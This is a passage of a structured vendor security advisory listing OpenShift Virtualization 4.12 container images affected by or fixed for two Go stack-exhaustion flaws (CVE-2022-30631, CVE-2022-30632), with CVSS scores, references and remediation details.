"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30631", }, { category: "external", summary: "RHBZ#2107342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30631", url: "https://www.cve.org/CVERecord?id=CVE-2022-30631", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30631", }, { category: "external", summary: "https://go.dev/issue/53168", url: "https://go.dev/issue/53168", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: compress/gzip: stack exhaustion in Reader.Read", }, { cve: "CVE-2022-30632", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107386", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: path/filepath: stack exhaustion in Glob", title: "Vulnerability summary", }, { category: "other", text: "The exploitation of this flaw will only result in a denial of service of the application via the application crashing which is why this has been rated as moderate.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", 